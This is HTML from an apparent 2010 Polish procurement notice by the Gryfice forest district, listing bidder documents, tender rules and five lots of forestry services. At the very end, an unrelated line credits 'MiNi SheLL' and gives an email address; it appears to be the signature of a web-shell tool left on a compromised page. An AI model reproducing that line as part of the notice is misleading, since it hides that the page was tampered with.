<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szczecin.lasy.gov.pl/gryfice<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Gryfice 	
Osada Zdrój 1, 72-300 Gryfice 
(p. 4).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2010 godzina 08:55, miejsce: Nadleśnictwo Gryfice 	
Osada Zdrój 1, 72-300 Gryfice
(p. 1).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Mrzeżyno, Gosław..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Mrzeżyno, Gosław w zakresie:
1. Godziny ręczne w zagospodarowaniu normowane i nienormowane - 7943,36 Nh+h
2. Godziny ręczne w zagospodarowaniu normowane i nienormowane (22% Vat) - 1871,50 Nh+h
3. Godziny mechaniczne w zagospodarowaniu normowane i nienormowane - 16,00 Nh+h
4. Godziny mechaniczne w zagospodarowaniu normowane i nienormowane (22% Vat) - 174,00 Nh+h
5. Pozyskanie drewna i czynność i pojedyncze wykonywane pilarką oraz godziny ręczne w pozyskaniu - 27397,32
Nh+h
6. Zrywka drewna - półpodwieszona - 1269,38 Nh
7. Zrywka drewna - nasiębierna z mechanicznym załadunkiem - 1113,43 Nh
8. Zrywka drewna prace godzinowe - 55 h
Szczegółowy opis przedmiotu zamówienia znajduje się w załącznikach nr 7 i 7a SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.20.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Raduń, Górzyca, Lubin oraz na Szkółce Leśnej Nadleśnictwa Gryfice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Raduń, Górzyca, Lubin oraz na Szkółce Leśnej
Nadleśnictwa Gryfice w zakresie:
1. Godziny ręczne w zagospodarowaniu normowane i nienormowane - 19999,94 Nh+h
2. Godziny ręczne w zagospodarowaniu normowane i nienormowane (22% Vat) - 4579,50 Nh+h
3. Godziny mechaniczne w zagospodarowaniu normowane i nienormowane - 802,03 Nh+h
4. Godziny mechaniczne w zagospodarowaniu normowane i nienormowane (22% Vat) - 341,40 Nh+h
5. Pozyskanie drewna i czynność i pojedyncze wykonywane pilarką oraz godziny ręczne w pozyskaniu - 40406,82
Nh+h
6. Zrywka drewna - półpodwieszona - 1628,98 Nh
7. Zrywka drewna - nasiębierna z mechanicznym załadunkiem - 1647,61 Nh
8. Zrywka drewna prace godzinowe - 190 h
Szczegółowy opis przedmiotu zamówienia znajduje się w załącznikach nr 7 i 7a SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.20.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Prusinowo, Rybokarty, Kołomąć..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Prusinowo, Rybokarty, Kołomąć w zakresie:
1. Godziny ręczne w zagospodarowaniu normowane i nienormowane - 20026,9 Nh+h
2. Godziny ręczne w zagospodarowaniu normowane i nienormowane (22% Vat) - 3920,79 Nh+h
3. Godziny mechaniczne w zagospodarowaniu normowane i nienormowane - 166,58 Nh+h
4. Godziny mechaniczne w zagospodarowaniu normowane i nienormowane (22% Vat) - 216,12 Nh+h
5. Pozyskanie drewna i czynność i pojedyncze wykonywane pilarką oraz godziny ręczne w pozyskaniu - 45356,38
Nh+h
6. Zrywka drewna - półpodwieszona - 1955,57 Nh
7. Zrywka drewna - nasiębierna z mechanicznym załadunkiem - 1754,82 Nh
8. Zrywka drewna prace godzinowe - 100,00 h
Szczegółowy opis przedmiotu zamówienia znajduje się w załącznikach nr 7 i 7a SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.20.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Pobierowo, Niczonów, Jatki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Pobierowo, Niczonów, Jatki w zakresie:
1. Godziny ręczne w zagospodarowaniu normowane i nienormowane - 12815,79 Nh+h
2. Godziny ręczne w zagospodarowaniu normowane i nienormowane (22% Vat) - 4058,80 Nh+h
3. Godziny mechaniczne w zagospodarowaniu normowane i nienormowane - 18,00 Nh+h
4. Godziny mechaniczne w zagospodarowaniu normowane i nienormowane (22% Vat) - 157,00 Nh+h
5. Pozyskanie drewna i czynność i pojedyncze wykonywane pilarką oraz godziny ręczne w pozyskaniu - 35036,96
Nh+h
6. Zrywka drewna - półpodwieszona - 1034,32 Nh
7. Zrywka drewna - nasiębierna z mechanicznym załadunkiem - 1456,11 Nh
8. Zrywka drewna prace godzinowe - 175,00 h
Szczegółowy opis przedmiotu zamówienia znajduje się w załącznikach nr 7 i 7a SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.20.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Świerzno, Chomino.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Świerzno, Chomino w zakresie:
1. Godziny ręczne w zagospodarowaniu normowane i nienormowane - 11958,15 Nh+h
2. Godziny ręczne w zagospodarowaniu normowane i nienormowane (22% Vat) - 4522,00 Nh+h
3. Godziny mechaniczne w zagospodarowaniu normowane i nienormowane - 26,31 Nh+h
4. Godziny mechaniczne w zagospodarowaniu normowane i nienormowane (22% Vat) - 139,82 Nh+h
5. Pozyskanie drewna i czynność i pojedyncze wykonywane pilarką oraz godziny ręczne w pozyskaniu - 33078,95
Nh+h
6. Zrywka drewna - półpodwieszona - 1391,40 Nh
7. Zrywka drewna - nasiębierna z mechanicznym załadunkiem - 1227,48 Nh
8. Zrywka drewna prace godzinowe - 65,00 h
Szczegółowy opis przedmiotu zamówienia znajduje się w załącznikach nr 7 i 7a SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.20.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com